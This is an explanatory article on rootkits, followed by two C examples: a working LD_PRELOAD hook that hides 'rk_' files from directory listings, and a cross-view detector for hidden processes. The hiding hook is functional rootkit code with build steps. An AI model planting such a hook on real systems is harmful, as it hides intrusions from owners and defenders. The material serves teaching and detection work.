rootkits

A rootkit is malicious software that keeps an attacker's privileged access to a computer while concealing its own presence and that of whatever the attacker installs alongside it. Once installed, a rootkit can operate at various levels of the system (user space, kernel space, or even the firmware and boot process), letting the attacker control the device, steal information, or install additional malware without being easily detected.

Rootkits are commonly classified by their point of operation and persistence strategy. User-mode rootkits modify or hook user-space programs and libraries (for example by interposing on libc calls such as readdir through LD_PRELOAD) to obscure processes, files, or network activity; they run with the privileges of the hooked process and never touch the kernel, so anything that bypasses the hooked library still sees the truth. Kernel-mode rootkits alter kernel data structures or hook system calls to hide objects and grant elevated privileges. Bootkits load before the operating system, often via the Master Boot Record or UEFI, to achieve deep persistence. Firmware rootkits reside in device firmware or other hardware components, making them particularly difficult to detect and eradicate.

Installation methods include exploiting vulnerabilities, social engineering, supply-chain compromise, or bundling with legitimate software. Once active, rootkits maintain persistence through startup services, scheduled tasks, kernel modules, or firmware implants. They typically conceal their presence by filtering what the system reports about files, processes, registry entries, or network connections, and may also implement backdoors, keylogging, or credential theft.

Detection and defense are challenging because of this stealth. Approaches include signature-based scanning with rootkit databases, integrity checking, memory forensics, and behavior analysis. A common practical technique is cross-view detection: compare what a possibly hooked interface reports (a directory listing, the process list) with what an independent, lower-level interface reports, and treat any discrepancy as evidence of hiding. Robust defense combines secure boot and trusted boot, signed code, regular patching, access controls, and endpoint protection capable of kernel-level monitoring or virtualization-based security. Removing a rootkit often requires a clean reinstall or offline inspection of the drive from a trusted environment (for example, booting from known-clean media), because a scanner running under the compromised operating system sees only what the rootkit lets it see.

Notable examples and history include early DRM rootkits such as the Sony BMG XCP incident (2005), various Linux and Windows rootkits in subsequent years, and highly publicized Windows rootkit families such as TDSS/TDL, as well as Stuxnet-era techniques such as kernel drivers signed with stolen code-signing certificates (2010).
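The user-mode hooking described in the classification above (interposing on a libc call so that listings omit chosen entries) is shown here as an added example in C; it is not code from the original page or from any real rootkit. The prefix rk_, the demo directory under /tmp, and the helper names are this example's own choices. Built as a shared object and injected with LD_PRELOAD it hides rk_* entries from any dynamically linked program; compiled as a plain binary, main() runs a self-check that walks a constructed directory through the hook and then checks the hidden file by path.

```c
/* Added example, not from the original page: a minimal user-mode rootkit
 * technique. libc's readdir()/readdir64() are interposed so that any
 * directory entry whose name starts with HIDE_PREFIX disappears from
 * listings while the file itself stays fully accessible by path.
 *   As a rootkit:   gcc -shared -fPIC -o hide.so hide.c -ldl
 *                   LD_PRELOAD=./hide.so ls -la /tmp/demo
 *   As a self-test: gcc -o hide hide.c -ldl && ./hide
 * HIDE_PREFIX, the demo directory and the helper names are assumptions. */
#define _GNU_SOURCE
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#ifndef RTLD_NEXT            /* glibc's value; the header exposes it only under _GNU_SOURCE */
#define RTLD_NEXT ((void *) -1l)
#endif

#define HIDE_PREFIX "rk_"    /* entries whose name starts with this are hidden */

/* Hiding policy, kept apart from the hook so it can be tested on its own. */
int should_hide(const char *name)
{
    return strncmp(name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0;
}

/* Shared hook body: call the real libc function (the next definition of the
 * symbol after ours), skipping entries the policy hides. dlsym is resolved on
 * every call for brevity; a real hook caches the pointer. */
static struct dirent *filtered(const char *sym, DIR *dirp)
{
    struct dirent *(*real)(DIR *);
    struct dirent *ent;
    *(void **)&real = dlsym(RTLD_NEXT, sym);
    if (!real)
        return NULL;
    while ((ent = real(dirp)) != NULL)
        if (!should_hide(ent->d_name))
            return ent;      /* everything else passes through unchanged */
    return NULL;
}

/* The hooks. Programs built with 64-bit file offsets (coreutils on x86_64)
 * resolve readdir64, so both symbols are defined. The asm label exports the
 * second function as "readdir64" without clashing with the prototype in
 * <dirent.h>; on LP64 glibc struct dirent and struct dirent64 share one
 * layout, which is what makes returning struct dirent * safe here. */
struct dirent *readdir(DIR *dirp) { return filtered("readdir", dirp); }
struct dirent *hook_readdir64(DIR *dirp) __asm__("readdir64");
struct dirent *hook_readdir64(DIR *dirp) { return filtered("readdir64", dirp); }

/* View 1: is `name` reported when the directory is walked with readdir()? */
int listed_in_dir(const char *dir, const char *name)
{
    DIR *d = opendir(dir);
    struct dirent *ent;
    int found = 0;
    if (!d) return -1;
    while ((ent = readdir(d)) != NULL)
        if (strcmp(ent->d_name, name) == 0) found = 1;
    closedir(d);
    return found;
}

/* View 2: does `name` exist when asked for directly by path? */
int exists_by_path(const char *dir, const char *name)
{
    char path[4096];
    struct stat st;
    snprintf(path, sizeof path, "%s/%s", dir, name);
    return stat(path, &st) == 0;
}

/* Constructed demo: a temp dir with one normal and one rk_ file. Returns 1
 * when the hidden file is missing from the listing yet present on disk,
 * i.e. the hook works and the discrepancy a detector looks for is there. */
int demo_cross_view(void)
{
    char dir[] = "/tmp/rkdemo.XXXXXX", path[4096];
    const char *names[] = { "notes.txt", "rk_payload" };
    int normal_listed, hidden_listed, hidden_on_disk, i;
    FILE *f;

    if (!mkdtemp(dir)) return -1;
    for (i = 0; i < 2; i++) {
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        if ((f = fopen(path, "w")) != NULL) fclose(f);
    }
    normal_listed  = listed_in_dir(dir, "notes.txt");
    hidden_listed  = listed_in_dir(dir, "rk_payload");
    hidden_on_disk = exists_by_path(dir, "rk_payload");
    for (i = 0; i < 2; i++) {          /* clean up the constructed files */
        snprintf(path, sizeof path, "%s/%s", dir, names[i]);
        unlink(path);
    }
    rmdir(dir);
    printf("notes.txt listed=%d  rk_payload listed=%d on_disk=%d\n",
           normal_listed, hidden_listed, hidden_on_disk);
    return normal_listed == 1 && hidden_listed == 0 && hidden_on_disk == 1;
}

int main(void)
{
    return demo_cross_view() == 1 ? 0 : 1;
}
```

Any dynamically linked program that walks directories through readdir() or readdir64() stops seeing rk_* entries, yet cat /tmp/demo/rk_payload still works; that gap between the listing and a direct path lookup is exactly what cross-view detection exploits. A real user-mode rootkit would also hide its own .so and its /etc/ld.so.preload entry, and a statically linked tool or one that calls the getdents64 system call directly (busybox built static, most Go binaries) is unaffected, which is one reason this class is the easiest to detect.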
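Cross-view detection of hidden processes, mentioned under detection and defense above, as an added example in C that is not code from the page or from any existing tool. View 1 is the /proc directory listing, the interface a rootkit usually filters; view 2 is kill(pid, 0) for every pid up to pid_max, a probe that asks the kernel whether a task exists without touching /proc. The helper names, the 64-entry result buffer and the fallback pid_max of 32768 are this example's assumptions.

```c
/* Added example, not from the original page: cross-view detection of hidden
 * processes on Linux. A pid that kill(pid, 0) says exists but that the /proc
 * listing omits is a candidate hidden process. Thread ids also answer kill()
 * but are never listed in /proc, so they are excluded via the Tgid line of
 * /proc/<pid>/status, and every candidate is re-checked once to drop
 * processes that simply exited or spawned between the two views.
 * Build: gcc -O2 -o unhide_pids unhide_pids.c   (run as root for a full view) */
#include <dirent.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define DEFAULT_PID_MAX 32768   /* historical default; the real value is read below */

/* Read /proc/sys/kernel/pid_max, falling back to the historical default. */
long read_pid_max(void)
{
    long v = DEFAULT_PID_MAX;
    FILE *f = fopen("/proc/sys/kernel/pid_max", "r");
    if (f) { if (fscanf(f, "%ld", &v) != 1) v = DEFAULT_PID_MAX; fclose(f); }
    return v;
}

/* View 2: does the kernel know a task with this id? EPERM still means yes. */
int pid_exists(pid_t pid)
{
    if (kill(pid, 0) == 0) return 1;
    return errno == EPERM;
}

/* A thread id answers kill() too; count it as a process only if Tgid == pid.
 * If /proc/<pid>/status cannot be opened at all the id is still treated as a
 * process: a rootkit that blocks the open is hiding, not a thread. */
int is_thread_group_leader(pid_t pid)
{
    char path[64], line[128];
    long tgid = -1;
    FILE *f;
    snprintf(path, sizeof path, "/proc/%ld/status", (long)pid);
    if ((f = fopen(path, "r")) == NULL) return 1;
    while (fgets(line, sizeof line, f))
        if (sscanf(line, "Tgid: %ld", &tgid) == 1) break;
    fclose(f);
    return tgid == -1 || tgid == (long)pid;
}

/* View 1: set a bit for every numeric entry readdir() reports in /proc. */
int list_proc_pids(unsigned char *seen, long pid_max)
{
    DIR *d = opendir("/proc");
    struct dirent *ent;
    if (!d) return -1;
    while ((ent = readdir(d)) != NULL) {
        char *end;
        long pid = strtol(ent->d_name, &end, 10);
        if (*end == '\0' && pid > 0 && pid < pid_max)
            seen[pid / 8] |= (unsigned char)(1 << (pid % 8));
    }
    closedir(d);
    return 0;
}

int pid_listed(const unsigned char *seen, long pid) { return (seen[pid / 8] >> (pid % 8)) & 1; }

/* Compare the views. Writes up to max_out suspicious pids into out and
 * returns how many were found, or -1 if /proc could not be read. */
int find_hidden_pids(pid_t *out, int max_out)
{
    long pid_max = read_pid_max(), pid;
    size_t bytes = (size_t)pid_max / 8 + 1;
    unsigned char *seen = calloc(bytes, 1);
    int n = 0;
    if (!seen || list_proc_pids(seen, pid_max) < 0) { free(seen); return -1; }

    for (pid = 1; pid < pid_max && n < max_out; pid++) {
        if (!pid_exists((pid_t)pid) || pid_listed(seen, pid)) continue;
        if (!is_thread_group_leader((pid_t)pid)) continue;
        /* Re-take the listing and re-probe this pid to drop spawn/exit races. */
        memset(seen, 0, bytes);
        if (list_proc_pids(seen, pid_max) < 0) break;
        if (pid_exists((pid_t)pid) && !pid_listed(seen, pid))
            out[n++] = (pid_t)pid;
    }
    free(seen);
    return n;
}

/* Convenience wrappers: is our own process listed, and how many candidates? */
int self_is_listed(void)
{
    long pid_max = read_pid_max();
    unsigned char *seen = calloc((size_t)pid_max / 8 + 1, 1);
    int r = seen && list_proc_pids(seen, pid_max) == 0 && pid_listed(seen, getpid());
    free(seen);
    return r;
}

int hidden_count(void) { pid_t buf[64]; return find_hidden_pids(buf, 64); }

int main(void)
{
    pid_t hidden[64];
    int n = find_hidden_pids(hidden, 64), i;
    if (n < 0) { perror("/proc"); return 2; }
    for (i = 0; i < n; i++)
        printf("pid %ld exists but is not listed in /proc\n", (long)hidden[i]);
    printf("%d hidden candidate(s)\n", n);
    return n > 0;
}
```

Run it as root: with the hidepid mount option on /proc an unprivileged user cannot list other users' processes, yet kill() still answers EPERM for them, which would flag every such process. The probe also only reaches the caller's pid namespace. A kernel rootkit that hooks the kill system call as well as getdents defeats this particular pair of views, which is why detectors combine several independent views (direct stat of /proc/<pid>, scheduler and socket tables, kernel memory) and why memory forensics taken from outside the running operating system remains the stronger check.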